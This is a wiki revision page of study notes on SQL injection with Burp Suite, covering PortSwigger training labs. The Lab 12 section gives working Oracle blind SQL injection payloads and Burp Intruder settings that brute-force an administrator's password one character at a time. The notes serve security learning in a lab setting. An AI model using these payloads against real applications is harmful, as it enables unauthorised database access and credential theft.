Burp Suite/SQL Injection: Difference between revisions
From charlesreid1
| Line 130: | Line 130: | ||
* 200 response means first character of password is NOT a | * 200 response means first character of password is NOT a | ||
* 500 response means first character of password IS a | * 500 response means first character of password IS a | ||
* copy that SQL query and put it into Repeater: | |||
* copy and paste into TrackingId | |||
* Control + U to URL encode it | |||
* 200 response - meaning a is not the first character of the password | |||
* Intruder > Positions > Clear | |||
* select "a" and choose Add, | |||
* then go to Intruder > Payloads | |||
* Payload Type: Brute forcer (tries all the alphanumeric characters) | |||
* min length = 1, max length = 1 | |||
* generates 36 requests, | |||
* looking for one 500 response ("w") | |||
* next, try for second, then third, and so on. | |||
* instead of doing that 20 times, automate it: | |||
step 6: automate the attack in burp suite | |||
* Intruder > Positions | |||
* Change Attack type to Cluster bomb | |||
* select substring position number "1" and choose Add. select character "a" being checked and choose Add. | |||
* Intruder > Payloads | |||
* payload parameter 1 - position - Numbers type (from 1, to 20, step 1) - iterates over each letter position. | |||
* payload parameter 2 - letter - Brute forcer (all alphanumeric characters, min length = max length = 1) | |||
* this will generate 720 requests total | |||
==Cheat Sheet== | ==Cheat Sheet== | ||
https://portswigger.net/web-security/sql-injection/cheat-sheet | https://portswigger.net/web-security/sql-injection/cheat-sheet | ||
Revision as of 02:13, 22 May 2023
This page covers how to perform SQL Injection attacks with Burp Suite.
Burp Suite Training
SQL Injection Labs
Main article: SQL Injection
https://portswigger.net/web-security/sql-injection
Lab 1: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
- https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data
- https://www.youtube.com/watch?v=alTceRdSxS0
- lab doesn't require burp suite, just tinkering with URL parameters
- single quotes raising internal errors are a sign of SQL Injection vulnerability
Lab 2: SQL injection vulnerability allowing login bypass
- https://portswigger.net/web-security/sql-injection/lab-login-bypass
- https://www.youtube.com/watch?v=ML3aGaloczI
- lab doesn't require burp suite, just feeding SQL queries into login form
- guessing
SELECT firstname FROM users WHERE username='admin' AND password='admin' - single quotes raising internal errors are a sign of SQL Injection vulnerability
- if at first you don't succeed, try, try again: admin, administrator, etc etc etc
- https://www.youtube.com/watch?v=fMPvCyD2v4w
- This is another version of the same lab, but using the Python requests library
SQL Injection UNION Attacks
Main article: SQL Injection/UNION Attack
https://portswigger.net/web-security/sql-injection/union-attacks
Lab 3: SQL injection UNION attack, determining the number of columns returned by the query
- https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns
- this page covers a ton of information: SQL Injection/UNION Attack
- guide: https://www.youtube.com/watch?v=umXGHbEyW5I
Lab 4: SQL injection UNION attack, finding a column containing text
- https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text
- guide: https://www.youtube.com/watch?v=SGBTC5D7DTs
Lab 5: SQL injection UNION attack, retrieving data from other tables
- https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables
- guide: https://www.youtube.com/watch?v=6Dsj5SqR944
Lab 6: SQL injection UNION attack, retrieving multiple values in a single column
- https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-in-single-column
- guide: https://www.youtube.com/watch?v=yRVYoqR9vrI
Examining the Database
Lab 7: SQL injection attack, querying the database type and version on Oracle
Lab 8: SQL injection attack, querying the database type and version on MySQL and Microsoft
Lab 9: SQL injection attack, listing the database contents on non-Oracle databases
Lab 10: SQL injection attack, listing the database contents on Oracle
Blind SQL Injection
Main article: SQL Injection/Blind
https://portswigger.net/web-security/sql-injection/blind
Lab 11: Blind SQL injection with conditional responses
- https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses
- https://www.youtube.com/watch?v=LBG_n9fr8sM&themeRefresh=1
Lab 12: Blind SQL injection with conditional errors
- https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors
- https://www.youtube.com/watch?v=_7w-KEP_K5w
- this one takes a while, and is faster to do with the professional edition
- visit a page, capture request, add a single quote to a cookie TrackingId parameter to raise a 500 error
step 1: prove parameter is vulnerable
- to prove the parameter is vulnerable to SQL injection, use concat operator
|| ' || (select '') || '- this is a well-formatted SQL query, but returns a 500 error
- weird, because this should work, not return a 500 error
- indication that this could be an oracle database, since it requires a FROM clause to be well-formatted
' || (select '' from dual) || '- Paste that SQL into the Cookie TrackingId, use Control + U to URL encode it
- dual is a built-in Oracle database
- this works, indicating this is, in fact, an Oracle database
- but if we replace "dual" with "dualoiweuroqiurepoiquwer" then it fails
step 2: confirm users table exists in database
' || (select from users) || '- this returns an internal server error
- the problem may be with the number of fields returned (???)
- modify query to the following:
' || (select from users where rownum = 1) || '- that returns a 200, indicating there is, in fact, a users table in the daatabase
step 3: confirm the administrator user exists in the users database
- to do this: modify prior SQL query
' || (select '' from users where username='administrator') || '- the problem: either way, this will return a 200 (if there is no administrator user, just doesn't return anything)
- solution: add conditional, and divide by zero if conditional is met
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual) || 'should cause an error' || (select CASE WHEN (1=0) THEN TO_CHAR(1/0) ELSE '' END FROM dual) || 'should NOT cause an error- now we can use that to check for the username:
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='administrator') || '- the FROM section is executed first. if it is true, then it executes the select portion of the query (which raises an error). if it is false, then it skips the select portion of the query, so it never outputs an error.
- in other words, 200 response means user does not exist in database
step 4: check the length of the password by modifying the same query
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='administrator' and LENGTH(password)>1) || '- the FROM section is executed first. if it is true (if password length > 1), it raises a 500 error. increment 1 until you get the final length of the password (whatever password length it returns 200 for).
- to generate lots of requests, right-click request and choose Send to Intruder
- Intruder > Positions > Clear
- select "1" (password length) and choose Add
- Intruder > Payloads > Numbers, sequential, from 1 to 50, step count of 1
- when payload of 20 is sent, it returns a 200 status code
- so, we know length of password is 20 (condition is not met when > 20)
step 5: output the administrator password
- we have 20 characters to enumerate
- modify query from preceding, but use substring function
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username='administrator' and SUBSTR(password,1,1)='a') || '- how does this work?
- first thing that gets run is the FROM clause, which checks if there is a users table and a username administrator, and it checks if the first character is equal to a. if so, it will run the CASE statement, which will run the code that raises the error.
- 200 response means first character of password is NOT a
- 500 response means first character of password IS a
- copy that SQL query and put it into Repeater:
- copy and paste into TrackingId
- Control + U to URL encode it
- 200 response - meaning a is not the first character of the password
- Intruder > Positions > Clear
- select "a" and choose Add,
- then go to Intruder > Payloads
- Payload Type: Brute forcer (tries all the alphanumeric characters)
- min length = 1, max length = 1
- generates 36 requests,
- looking for one 500 response ("w")
- next, try for second, then third, and so on.
- instead of doing that 20 times, automate it:
step 6: automate the attack in burp suite
- Intruder > Positions
- Change Attack type to Cluster bomb
- select substring position number "1" and choose Add. select character "a" being checked and choose Add.
- Intruder > Payloads
- payload parameter 1 - position - Numbers type (from 1, to 20, step 1) - iterates over each letter position.
- payload parameter 2 - letter - Brute forcer (all alphanumeric characters, min length = max length = 1)
- this will generate 720 requests total
Cheat Sheet
https://portswigger.net/web-security/sql-injection/cheat-sheet